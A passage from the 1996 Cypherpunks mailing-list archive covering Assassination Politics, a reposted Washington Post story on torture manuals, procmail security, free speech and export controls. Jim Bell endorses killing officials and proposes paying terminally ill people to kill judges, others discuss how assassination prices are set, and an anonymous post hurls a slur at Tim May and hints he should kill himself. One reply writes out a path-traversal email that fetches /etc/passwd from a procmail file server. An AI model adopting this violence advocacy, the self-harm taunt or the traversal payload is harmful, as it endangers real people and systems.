closely, and >>you'll hear of a group which is operating in southern Mexico, the "EPR," which >>is killing off government employees, politicians, and police. True, they're >>not implementing the mathematical, digital-cash basis behind AP, but they >see >>to be making good progress against the corruption which is Mexico. >>Increase their productivity by a factor of 10, and the Mexican government would >>be terrified. Increase it by 100, and the Mexican government would fall within >>a few months. > > >Jim's makes a good, if gruesome, point here, about the vicious realities of >do-or-die AP, by even our own apple pie government. > > >The Washington Post reports at length today on the Defense Department's >disclosure yesterday of heretofore classified trainging manuals used in the >School of the Americas to instruct Latino troops on killing a wide range of >civilians for political purposes. >To read "Army Instructed Latins On Executions, Torture," about your tax >dollars working the AP angle: > >http://jya.com/usaexe.txt This article is so wonderfully appropriate to the discussion that I can't resist re-posting it here. I think the part about only discovering the problem in 1992 after 10 years is particularly precious. In addition, I notice that a listing of the appropriate targets these army people were supposed to "neutralize" are listed as: The manual on "Terrorism and the Urban Guerrilla" says that "another function of the CI agents is recommending CI targets for neutralizing. The CI targets can include personalities, installations, organizations, documents and materials ... the personality targets prove to be valuable sources of intelligence. Some examples of these targets are governmental officials, political leaders, and members of the infrastructure." full article posted below: The Washington Post, September 21, 1996, pp. A1, A9. Army Instructed Latins On Executions, Torture Manuals Used 1982-91, Pentagon Reveals By Dana Priest U.S. Army intelligence manuals used to train Latin American military officers at an Army school from 1982 to 1991 advocated executions, torture, blackmail and other forms of coercion against insurgents, Pentagon documents released yesterday show. Used in courses at the U.S. Army's School of the Americas, the manual says that to recruit and control informants, counterintelliigence agents could use "fear, payment of bounties for enemy dead, beatings, false imprisonment, executions and the use of truth serum," according to a secret Defense Department summary of the manuals compiled during a 1992 investigation of the instructional material and also released yesterday. A summary of the investigation and four pages of brief, translated excerpts from the seven Spanish-language manuals were released last night by the Defense Department, which recently has taken to making controversial information available in the evenings, after the deadlines of the prime-time network television news programs. The Army School of the Americas, long located in Panama but moved in 1984 to Fort Benning, Ga, has trained nearly 60,000 military and police officers from Latin America and the United States since 1946. Its graduates have included some of the region's most notorious human rights abusers, among them Roberto D'Aubuisson, the leader of El Salvador's right-wing death squads; 19 Salvadoran soldiers linked to the 1989 assassination of six Jesuit priests; Gen. Manuel Antonio Noriega, the deposed Panamanian strongman; six Peruvian officers linked to killings of students and a professor; and Col. Julio Roberto Alpirez, a Guatemalan officer implicated in the death of an American innkeeper living in Guatemala and to the death of a leftist guerrilla married to an American lawyer. The Defense Department said the school's curriculum now includes mandatory human rights training and it is an effective way to help promote military professionalism in a region where that concept is still nascent. "The problem was discovered in 1992, properly reported and fixed," said Lt. Col. Arne Owens, a Pentagon spokesman. "There have been a lot of great changes at the School of the Americas." When reports of the 1992 investigation surfaced this year during a congressional inquiry into the CIA's activities in Guatemala, spokesmen for the school denied the manuals advocated such extreme methods of operation, which were in violation of Army policy and law at the time they were in use. The 1992 investigation concluded the inclusion of the methods was the result of bureaucratic oversight. "It is incredible that the use ... since 1982 ... evaded the established system of doctrinal controls," said the report of the investigation, conducted by the office of the assistant to the secretary of defense for intelligence oversight. "Nevertheless, we could find no evidence that this was a deliberate and orchestrated attempt to violate DoD or Army policies." The manuals were complied by Army intelligence officials using "outdated instructional material without the required doctrinal approval" from the Army Intelligence School, the investigation report said. The material was based, in part, on training instructions used in the 1960s by the Army's Foreign Intelligence Assistance Program, entitled "Project X." The 1992 investigation also found the manual was distributed to thousands of military officers from 11 South and Central American countries, including Guatemala, El Salvador, Honduras and Panama, where the U.S. military was heavily involved in counterinsurgency. One manual, entitled "Handling of Sources," also "discloses classified [informant] methodology that could compromise Army clandestine intelligence modus operandi," the 1992 investigation found. Another manual, entitled "Counterintelligence," contained "sensitive Army counterintelligence tactics, techniques and procedures." The Defense Department yesterday said the 1992 investigators found two dozen objectionable passages among the 1,169 pages of instruction. For instance, the manual entitled "Handling of Sources" says, "The CI [counterintelligence] agent could cause the arrest of the employees [informants] parents, imprison the employee or give him a beating" to coerce cooperation. On several occasions it uses the words "neutralization" or "neutralizing," which was commonly used at the time as a euphemism for execution or destruction, a Pentagon official said. The manual on "Terrorism and the Urban Guerrilla" says that "another function of the CI agents is recommending CI targets for neutralizing. The CI targets can include personalities, installations, organizations, documents and materials ... the personality targets prove to be valuable sources of intelligence. Some examples of these targets are governmental officials, political leaders, and members of the infrastructure." The Defense Department continues to try to collect the manuals but, as the 1992 investigation noted, "due to incomplete records, retrieval of all copies is doubtful." Rep. Joseph P. Kennedy II (D-Mass.), an advocate of closing the school, said in a statement last night that the manuals "show what we have suspected all along, that taxpayers' money has been used for physical abuse." Kennedy said, "The School of the Americas, a Cold War relic, should be shut down." [End] Jim Bell jimbell at pacifier.com From ichudov at algebra.com Sun Sep 22 00:04:11 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Sun, 22 Sep 1996 15:04:11 +0800 Subject: How to use procmail In-Reply-To: <199609050006.TAA07462@homeport.org> Message-ID: <199609220423.XAA00811@manifold.algebra.com> Adam Shostack wrote: > :0 > * From bal at swissnet.ai.mit.edu > { > :0 h > * >10000 > /dev/null > > :0 h > *^Subject:.*no keys match > /dev/null > > :0: > *Subject: Your command, ADD > $DEFAULT > > > :0E > | pgp +batchmode -fka Isn't this vulnerable to "deadbeef" attacks? I can also see an attack when someone sends you an email with the spooofed "From " address and a user name that is the same (or almost the same) as that of your trusted parties. Suppose that you correspond with mrx at provider.com and you use encryption command pgp -eaf mrx Then I can send you a bogus email containing a key for mrx at bogus.com and next time you encrypt something for your friend nrx at provider.com, you will actually encrypt it with the wron key. If I intercept your email, your message to mrx can be compromised. > # basic file server. Only sends whats in .outbound > :0 > * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$ > * !^Subject:.*[ /.]\. > * !^FROM_DAEMON > { > # FILE=`formail -x Subject: | sed 's/.* //'` > FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'` > > :0c > | (formail -rt -A"Precedence: junk";\ > cat $HOME/.outbound/$FILE) | $SENDMAIL -t *If* .outbound has some subdirectories (say subdir), How about this email: From: dumbass at aol.com Subject: GET subdir/../../../../etc/passwd Reply-To: blin at algebra.com xxx - Igor. From pstira at escape.com Sun Sep 22 00:07:52 1996 From: pstira at escape.com (pstira at escape.com) Date: Sun, 22 Sep 1996 15:07:52 +0800 Subject: DL in exchange for fingerprint In-Reply-To: <199609191223.IAA13606@jafar.issl.atl.hp.com> Message-ID: On Thu, 19 Sep 1996, Jeff Barber wrote: > Oh joy. You no longer need to be arrested to get fingerprinted > in Georgia. On the front page of Wednesday's Atlanta Journal, under > the headline "Now you can get driver's license in minutes": > Just what I would have called it: a great idea. Is it true that 31 > other states take your fingerprint as part of the license application? > I feel sick. I know for sure Hawai'i does -- and not just for licenses. They take em for civil ID's too -- and are incredibly bitchy about forms of ID. -Millie From azur at netcom.com Sun Sep 22 00:15:31 1996 From: azur at netcom.com (Steve Schear) Date: Sun, 22 Sep 1996 15:15:31 +0800 Subject: Kill 'em and let God sort it out, was Re: The GAK Momentum is Building... Message-ID: > jim bell wrote: >Naturally, you won't even consider the possibility of going outside the >system to solve a problem. The rest of us notice that there are probably >thousands of terminally-ill people who would gladly act as a human kamikaze >and get rid of any judge inclined to impose such a fine, for a payment of 1% >of this principle amount to a family member or loved one, leaving 99% >available for the few other judges foolish enough to basically commit >suicide by taking up a futile gesture. > If AP came to be seen as an acceptable way for business and citizens to right egregious wrongs it would quickly lead to a 'law of the jungle' situation, which I think any sane person would reject as the cure being worse than the disease. However, if governemnts (especially ours) continue to expand their implied authority and greatly diminishing personal liberties we all took for granted were inaliable human rights (in our own best interest, of course), a time may come when a bit of rebellion may be the only viable alternative for self-correction. I pray it never comes to this, but Thomas Jefferson contemplating this said: "God forbid we should ever be 20 years without such a rebellion. . . .What country can preserve it's liberties if their rulers are not warned from time to time that their people preserve the spirit of resistance?. . .The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants." -- Thomas Jefferson, regarding Shay's Rebellion and anarchy. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. From pgf at acadian.net Sun Sep 22 00:16:35 1996 From: pgf at acadian.net (Phil Fraering) Date: Sun, 22 Sep 1996 15:16:35 +0800 Subject: USA_exe (Kiddie porn on the Internet) In-Reply-To: <199609220023.AAA29950@pipe4.ny3.usa.pipeline.com> Message-ID: If you think the Mexican government would sit still while whatever the rebels are called this week escalated their violence, you'd be crazy. With the sort of stuff being suggested, the retaliation wouldn't just get SubCommander Marcos, but the whole submarine and the rest of the fleet ;-). Vulnerability works both ways. Phil Fraering "And the moral of the story is, pgf at acadian.net *never count your boobies until they 318/261-9649 are hatched*." - James Thurber, "The Unicorn in the Garden" From jimbell at pacifier.com Sun Sep 22 00:38:14 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 15:38:14 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609220525.WAA21842@mail.pacifier.com> At 11:30 PM 9/21/96 -0400, Mark M. wrote: >On Sat, 21 Sep 1996, jim bell wrote: > >> At the risk of being a devil's advocate, let me suggest that you are >> conceding too much even with the preceding paragraph. The 1st amendment >> says nothing about preventing speech which (even admittedly) would result >> in "direct, immediate, and irreparable damage to our nation or its people." > >I believe there is one section in the Constitution that says that speech >harmful to national security is not protected under the 1st amendment. I can't think of what portion of the Constitution you're referring to. But chances are, somebody else will see this reference and comment. > However, >I don't agree with this provision at all. "National security" is a phrase that >is applied to anything from information on the JFK assassination to DES source >code. ...and it's one of the most abused concepts there is. >> I could list many more, but won't because of lack of space. But notice >> that, presumably, each and every one of these incidents was AT ONE TIME kept >> secret, arguably because it would be better for the country to do so. Thus, >> presumably it was thought or at least asserted that to reveal them would >> cause "damage to our nation or its people." > >If secret information was released, it would cause most people to completely >lose respect for the government (some people call this damage -- I call it >progress). Yes! I, of course, agree with the latter interpretation as well. It is precisely this distinction which, I believe, makes it so vital that lawsuits such as this Bernstein one NOT "concede" what doesn't need to be conceded. All they should say is that even if there are secrets which the law should protect, they cannot include information known by civilians in peacetime. >> The way you've written the paragraph I've quoted above, it appears that you >> are somehow acknowleding that there are certain circumstances where certain >> types of speech are controllable because they are "harmful," but you fail to >> explain how even this constitutional restiction is tolerable. Frankly, I >> don't see it! What you need to do is to be far more specific about such >> speech and exactly where it can be controlled. > >There may be certain circumstances under which speech can be directly harmful. >Military operations and missle launch codes are things that should be kept >secret. Information about high-powered weapons should be too. If the Japanese >had been able to get information about how to build A-bombs during WWII, major >cities in the U.S. probably would have been completely wiped out. I don't like >the idea that the government has the power to decide what's harmful and what >isn't, but there are beneficial uses of the provision. The few examples that exist, as you've selected them above, seem to be almost entirely based on military secrets in time of war. It is not clear whether a non-security clearance civilian is restricted in any way, nor should he be. Jim Bell jimbell at pacifier.com From dlv at bwalk.dm.com Sun Sep 22 00:42:05 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 22 Sep 1996 15:42:05 +0800 Subject: Continuing spam from Timmy May and his friends Message-ID: I recently sent the following article to this mailing list: ]To: cypherpunks at toad.com ]Subject: Re: DL in exchange for fingerprint ]From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) ]Comments: Dole/Kemp '96! ]Message-Id: ]Date: Sat, 21 Sep 96 08:00:57 EDT ]In-Reply-To: ]Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. ] ]Black Unicorn writes: ]> > Do you simply drive without a valid driver's license? I know some folks who ]> > do, of course, but it's not something that's "worth it" to me. ]> ]> Some jurisdictions (D.C. is a good example) are such a joke it's not ]> funny. An associate of mine literally MADE his own Italian Driver's ]> license and turned it in, took an eye test, and walked out with a nice new ]> D.C. license. ] ]In NYC a very high percentage of drivers don't have licences, have suspended ]licences, etc. Generally no one has the time to bother with them unless they ]want to nail them for something else. A couple of years ago we were involved in ]a minor car accident with a Chassidic Jew who tried to leave the scene of the ]accident. My wife chased him and stopped him. :-) The cops came and discovered ]that he had no papers (including no driver's licence, no insurance, etc). They ]gave him about $500 worth of tickets for driving without a licence, leaving the ]scene of an accident, etc (which I rather doubt he was planning to pay) and let ]him drive on (still without the licence). ] ]--- ] ]Dr.Dimitri Vulis KOTM ]Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps I received the following e-mail from either Timmy May using an alternate account, or someone whose IQ is similar to Timmy's, in response: ]From Adamsc at io-online.com Sat Sep 21 22:40:36 1996 ]From: Adamsc at io-online.com (Adamsc) ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 96 19:40:29 -0800 ]Reply-To: "Chris Adams" ]X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2 ]X-Filtered: By PMMail 1.52 For OS/2 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset="us-ascii" ]Content-Transfer-Encoding: 7bit ]Subject: Re: Re: DL in exchange for fingerprint ]Message-Id: <19960922023957609.AAA206 at GIGANTE> ] ] You are being gently flamed because. ] ] [X] you continued a boring useless stupid thread ] [ ] you repeatedly posted to the same thread that you just posted to ] [x] you repeatedly initiated incoherent, flaky, and mindless threads ] [x] you posted a piece riddled with profanities ] [ ] you advocated Net censorship ] [ ] you SCREAMED! (used all caps) ] [x] you posted some sort of crap that doesn't belong in this group ] [ ] you posted the inanely stupid 'Make Money Fast' article ] [ ] you threatened others with physical harm ] [x] you made a bigoted statement(s) ] [x] you repeatedly assumed unwarranted moral or intellectual superiority ] [x] you are under the misapprehension that this group is your preserve ] [x] you repeatedly shown lack of humor ] [x] you are apparently under compulsion to post to every threat ] [?] you are posting an anonymous attack ] ] >>> Thank you for the time you have taken to read this. Live n' Learn.<<< ] ] ] ]# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp ]# cadams at acucobol.com | V.M. (619)515-4894 ]"I have never been able to figure out why anyone would want to play games on ]a computer in any case when the whole system is a game. Word processing, ]spreadsheets, telecoms -- it's all a game. And they pay you to play it." ] -- Duncan Frissell ] ] Just now I received about 2 dozen similar e-mails from this address, which therefore must be Timmy May's - I can't believe that there are two people on the 'net this stupid and obnoxious and prone to lying. In particular, I receive this spam from Timmy in response to each 'crypto-relevant wire clippings' post. Timmy May is definitely turning this mailing list into a political rant menagerie where cryptography discussions are not welcome. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From wombat at mcfeely.bsfs.org Sun Sep 22 01:02:42 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sun, 22 Sep 1996 16:02:42 +0800 Subject: timmy waxes a widdle on AP In-Reply-To: <199609211946.MAA27996@dns2.noc.best.net> Message-ID: On Sat, 21 Sep 1996, James A. Donald wrote: > At 08:11 PM 9/17/96 -0700, Vladimir Z. Nuri wrote: > > but I'm still a bit confused about those prices. what determines > > them, anyway? risk to the assassin? it seems that it ought to be > > as easy to snuff out one person as it would another. e.g. everybody > > walks alone out at night at different times, it seems. > > Although government services to the rich and poor cost about > the same, the quality is radically different. Thus the risk > involved in killing a poor person is vastly less than the > risk involved in killing a middle class person. > I think it is more likely an us-vs.-them mentality, rather than the cost of educating the person in question. If someone much poorer than you is killed in a poor neighborhood, you don't feel as threatened - it is one of "them" - If someone of equal or greater socio-economic background suffers a violent death, you begin to think "it could happen to me, too." Now it is a matter of "us." The higher up the scale you go, the more people on the "us" side of the coin, with more money/political clout as well. This increases the demand to apprehend the killer, which increases the risk to the killer, hence, a higher price for a hit on a target in a higher socio-economic position. It is not unusual for the investigation of drug-related murders to be lax; the "tax-paying" majority often says "let them bump each other off." With lax enforcement, lack of public outcry, there's less risk. The price is lower. Now if it is the lawyer that lives just down the street ... Ooops. Bad choice of profession. :) Bad wombat. No biscuit. g'nite, all. From wombat at mcfeely.bsfs.org Sun Sep 22 01:10:37 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sun, 22 Sep 1996 16:10:37 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: <199609212321.QAA07036@mail.pacifier.com> Message-ID: On Sat, 21 Sep 1996, jim bell wrote: > At 01:51 PM 9/17/96 -0700, Steve Schear wrote: > >>On Mon, 16 Sep 1996, Steve Schear wrote: > >> > >>> Someone wrote: > >>> We've all heard these arguments, but are they true? Who says so, and how > >>> can they be certain? Jim's suggestion has never, to my knowledge, been > >>> tried on a consistant, large, scale. When all conventional alternatives > >>> have been tried and fail, what have we or the starving children got to > >>> lose? > >> > >>I think "Lord of the Flies" answers this question quite well. > > > >Does it? LOTF was fiction. Can you identify a recent instance in which a > >non-governmental organization attempted to influence political/military > >events via a concerted AP? > Where is Jimmy Hoffa? From proff at suburbia.net Sun Sep 22 01:35:06 1996 From: proff at suburbia.net (Julian Assange) Date: Sun, 22 Sep 1996 16:35:06 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609220525.WAA21842@mail.pacifier.com> Message-ID: <199609220647.QAA13187@suburbia.net> > >There may be certain circumstances under which speech can be directly harmful. > >Military operations and missle launch codes are things that should be kept > >secret. Information about high-powered weapons should be too. If the > Japanese > >had been able to get information about how to build A-bombs during WWII, major > >cities in the U.S. probably would have been completely wiped out. I don't > like > >the idea that the government has the power to decide what's harmful and what > >isn't, but there are beneficial uses of the provision. > > The few examples that exist, as you've selected them above, seem to be > almost entirely based on military secrets in time of war. It is not clear > whether a non-security clearance civilian is restricted in any way, nor > should he be. You must remember there is a distinction to information in-confidence, and information generated independntly. It is only the breech of confidence that should be penalised, not the information itself. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From proff at suburbia.net Sun Sep 22 01:53:11 1996 From: proff at suburbia.net (Julian Assange) Date: Sun, 22 Sep 1996 16:53:11 +0800 Subject: LACC: Re: Australia now has information police In-Reply-To: Message-ID: <199609220643.QAA13076@suburbia.net> > > > Hello: > > I have one short, short question regarding this item. I really > hope that you know the anwswer and have the time to answer it. > > 1- International document: any idea who else had signed it? [re COCOM trade agreements] All COCOM countries most likely. That said Australia does not seem to be actively enforcing this relic of the cold war. However around 8 years ago, I recall that the NSA found out about a telephone encrypting device developed here in Australia, and preassured the Australian government to forbid export of the device, under COCOM provisions until it was weakened. At the moment it is politically untenable to enforce COCOM export provisions over cryptographic software in this country. The COCOM treaty is seen, quite rightly, as a U.S barrow which COCOM countries had to sign in order to avoid U.S trade sanctions and tarrifs, but not something that needs to be enforced for smaller concerns (arms shipments are bigger concerns). COCOM is being replaced with new controls, according to the PARI DAILY. (anyone have better details?) PARI DAILY FRIDAY, APRIL 5, 1996 BULGARIA IGNORED AT POST-COCOM TALKS Bulgaria did not take part in the first plenary session of the member-countries of the Wassenaar Arrangement, also known as the New Forum, Foreign Ministry spokesman Mr.Pantelei Karasimeonov told a briefing yesterday. Of all the 28 participants in the session, it was only USA that opposed Bulgaria's participation in the arrangement, a control regime which is to succeed the Cold War's COCOM export controls of technology and equipment usable for military purposes, too, it was revealed at the briefing. Bulgaria has stated many times, and at different levels, its willingness to join the new control regime, the Foreign Ministry spokesman emphasised. In a statement, disseminated by BTA, Bulgarian News Agency, Foreign Ministry pointed out that obviously some of the participants in the Wassenaar Arrangement talks are still under the rather depressing impressions of the suitable conditions created in the country for wide-ranging scot-free ruin and lack of ownership, which apply also to the military-industrial complex and foreign trade in spesial-purpose production. Mr. Karasimeonov said that these impressions have sprung from the period of radical economic and political reforms in the country; he voiced his hopes that the founder-states of the Wassenaar Arrangement would soon change these views of theirs and would put their trust in Bulgaria's export control abilities. Trade Ministry officials said that bilateral talks are due to be held between Bulgaria and each of the New Forum member-countries, which are expected to result in Bulgaria's joining the arrangement. An expert group is to visit USA from April 29 till May 3 aiming to acquaint American high officials with the measures Bulgaria has taken to control trade in spesial-purpose production, Mr.Vladimir Velichkov, head of Internationally Controlled Trade Department at Trade Ministry, said in a recent interview for the PARI Daily. By June an expert group of the Wassenaar Arrangement is due to visit Bulgaria to lead discussions about our participation in the New Forum. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From stewarts at ix.netcom.com Sun Sep 22 02:16:09 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 22 Sep 1996 17:16:09 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609220708.AAA20288@dfw-ix2.ix.netcom.com> At 01:34 PM 9/21/96 -0400, Phill wrote: >[AP drivel deleted] >If it could the US would have assasinated Saddam by now. It can't because it >is too difficult to find out where exactly a person will be. It's perfectly doable, it's just not politically expedient. One reason is that if they kill Saddam, they no longer have an excuse to keep threatening and attacking Iraq and making themselves look good. Another is that National Leaders have a tacit understanding between themselves never to assassinate other politicians [well, hardly ever....] If you break the taboo, you're implicitly inviting everyone else to go gunning for you, and it's too easy to do if there are enough people who really want you dead, especially well-organized people like a foreign army or spy service. If the US _had_ really wanted to assassinate Saddam, they could have hired professionals to do the job (like Mossad.) Instead they killed 200,000 other Iraqis, including civilians, draftees, and a few tens of thousands of real soldiers. >In addition *ANYONE* who attempted to implement AP would be someone *I* >would regard as a tyrant and therefore a legitimate target by the rules Yup. >I think that this type of talk is incredibly dangerous. There are plenty of >people on the net who are psychos and if you spread AP drivel arround someone >is going to act on it. I think a more realistic danger is that the government will use it as an excuse to attack all the techniques for private communications that cypherpunks have been suggesting will make AP possible. >PS it is not censorship to stop people from advocating murder. Nonsense. It certainly _is_ censorship, and it's hypocrisy to suggest otherwise. You can argue whether it's _justified_ censorship, just like the AP advocates argue whether assassination is justified murder, but censorship it is. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From dlv at bwalk.dm.com Sun Sep 22 02:19:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 22 Sep 1996 17:19:41 +0800 Subject: timmy waxes a widdle on AP In-Reply-To: Message-ID: Rabid Wombat writes: > I think it is more likely an us-vs.-them mentality, rather than the cost > of educating the person in question. If someone much poorer than you is > killed in a poor neighborhood, you don't feel as threatened - it is one > of "them" - If someone of equal or greater socio-economic background > suffers a violent death, you begin to think "it could happen to me, too." I was reading the other day about the lessons learned from the one-time tax refund in 1975. Most consumers realized that this is a one-time deal and saved most of it, rather than spent it. On the other hand, after Reagan's tax cuts the consumers spent much of their newly retained income because they believed that the lower tax rate would continue for a few years. Likewise once an occasional gubment official in Mexico is assassinated often enough for the population to perceive public service as being a hazardous profession, they'll have trouble recruiting the replacements. Assassinations won't work as long as they're perceived by the public as zero-probability events. The public perception depends on other factors besides the numbers or the frequency of the hits. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From attila at primenet.com Sun Sep 22 02:32:29 1996 From: attila at primenet.com (attila) Date: Sun, 22 Sep 1996 17:32:29 +0800 Subject: Chris Adams clever frame ...er, flame In-Reply-To: <19960922023806125.AAA206@GIGANTE> Message-ID: <199609220739.BAA27973@InfoWest.COM> In <19960922023806125.AAA206 at GIGANTE>, on 09/21/96 at 07:38 PM, Adamsc at io-online.com (Adamsc) said:  You are being gently flamed because. well, I look at creative writing in a different light: a) sarcasm is always in season b) Dr. Dimitri is always an excellent target c) if I had $10 for each sarcastic eoast in CP over the last 3 years I could retire in the style of tcmay, rather than the restrained mode I am retired. d) is there ever any dicussion on CP which does not flame out? e) your 'gentle flame' is a great idea. is it copyrighted f) CP charter was violated so often in last few years that I, and several others started a splinter for code only. if you can't handle the fun, sign off... g) CP's charm is it personalities last, but least: h) join the humour, or... well, lighten-up.  [X] you continued a boring useless stupid thread see item a) above  [x] you repeatedly initiated incoherent, flaky, and mindless threads et tu. brute?  [x] you posted a piece riddled with profanities I beg to differ with you! since when is allusion or illusion profane?  [x] you posted some sort of crap that doesn't belong in this group] see a) above, *again*  [x] you made a bigoted statement(s) hmmm, not on this one. besides, since when have we advocated PC speech  [x] you repeatedly assumed unwarranted moral or intellectual superiority I stand far back in the line for honours on that one --maybe in 2002?  [x] you are under the misapprehension that this group is your preserve yes! absolutely! but, I share it with 1000+ others  [x] you repeatedly shown lack of humor one man's "plum" is another man's "prune"  [x] you are apparently under compulsion to post to every threat wrong! I trash 75% before opening!  [?] you are posting an anonymous attack check the spook records listed under "Ace of Swords"  >>> Thank you for the time you have taken to read this. Live n' Learn.<<< your pleasure is my pleasure. -- "He said, `You are as constant as a northern star,' and I said, `Constantly in the darkness ? Where's that at ?'" --Joni Mitchell From stewarts at ix.netcom.com Sun Sep 22 02:46:24 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 22 Sep 1996 17:46:24 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609220730.AAA20792@dfw-ix2.ix.netcom.com> At 10:24 PM 9/21/96 -0800, Jim Bell wrote: >At 11:30 PM 9/21/96 -0400, Mark M. wrote: >>I believe there is one section in the Constitution that says that speech >>harmful to national security is not protected under the 1st amendment. >I can't think of what portion of the Constitution you're referring to. But >chances are, somebody else will see this reference and comment. The First Amendment does not contain the phrase "national security" anywhere in it. It does, however, begin with a rather explicit "Congress shall make no law" which it applies to a bunch of things. However, the body of the Constitution does say there should be a Supreme Court, and the Supreme Court has (fairly reasonably) given itself the job of deciding what's Constitutional and what's not. The Supremes have, over the years, made a bunch of generally outrageous decisions about what kinds of speech are protected by the First Amendment and what kinds aren't, though their opinions have been gradually improving since some of the really appalling ones earlier in the century. By the way, alt.federal.judge.bork.bork.bork has recently come out with a book in which he discusses issues like censorship. He's in favor of it. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From dthorn at gte.net Sun Sep 22 03:43:36 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 22 Sep 1996 18:43:36 +0800 Subject: Going AP Shit on the Internet In-Reply-To: <3.0b16.32.19960921222547.00e3e3e0@www.ctrl-alt-del.com> Message-ID: <3244F383.4743@gte.net> Black Art wrote: > At 06:22 PM 9/21/96 -0700, Dale Thorn wrote: > >[more examples of "why it wouldn't work" deleted] > >This is like Buliosi hyping his superior strategy all over TV (at > >least > >he had the decency to say the jury was basically honest). It's still > >strategy, folks. It doesn't say anything about the people's right to > >have more control over what is already happening. I just wish > >entities like Black Art would say "I'm doing all I possibly can to > >make sure the people DO get involved when govt. *decides* to murder > >someone". Then, entities like Black Art wouldn't be able to stand > >back in their righteousness and say that they're NOT responsible for > >what their govts. do. > What do you mean "when"? Government murders people all the time. As > for when you will find out about it... Most of the time, you will > not. Governments have gotten very good at hiding their crimes. Either > by orders of secrecy, appeals to patriotism, or doing it out of view > of the general public. > I realize my limitations in taking on an enitity as large as Uncle > Sugar. I do what I can to foil his plans (which is not much), but I do > not believe for a moment that he actually listens to the cries of the > peasants unless he wants to. Government is like a servant. He > wanders about your house at > all hours. Sneeks up on you when you are not looking. And will slip > something nasty into your drink if you become too much of a pain and > beleive that they will benifit by your death. > Governments are groups of individuals. Since they are not me, I have > no responsibility over their actions. (Any more than I have over > yours.) > Are you responsible for what your government does? Can we hold you > accountable for them? Punish you for those crimes? > I didn't think so. I'm hearing even more strategy, it would seem. I don't see the relevance of how govt. behaves (i.e., like a bad uncle who hangs around too long and molests the kids, etc.) to who's responsible. If you live in the U.S., that govt. is your agent, carrying out your representatives' instructions, and paid with your tax dollars. Unless and until this becomes a literal dictatorship (and there is a valid argument that it applies even then), you are responsible for whatever your paid agents do, from the street cop to the top politico. It's too bad your fellow citizens shirk their duty and watch TV instead, but issuing the above kinds of denial doesn't take the blood off of your hands or mine. Now maybe it would take God (for example) to judge whether you, I, or Joe Blow is more guilty, for lack of participation or some other citizen crime, but you can't put all the blame on your hired agents for their crimes, when you know very well what kinds of things they do, and you continue to fund them. You have to be considered an accessory, at least. From nobody at cypherpunks.ca Sun Sep 22 03:46:19 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sun, 22 Sep 1996 18:46:19 +0800 Subject: A daily word of caution regarding Tim C[ocksucker] May Message-ID: <199609220838.BAA25391@abraham.cs.berkeley.edu> `A pen is mightier than a sword', not to mention Tim C[ocksucker] May's pea-sized penis. He would be better served by a safety razor, possibly applied in a bathtub filled with warm water (something he has surely never been into). From whgiii at amaranth.com Sun Sep 22 03:53:18 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Sun, 22 Sep 1996 18:53:18 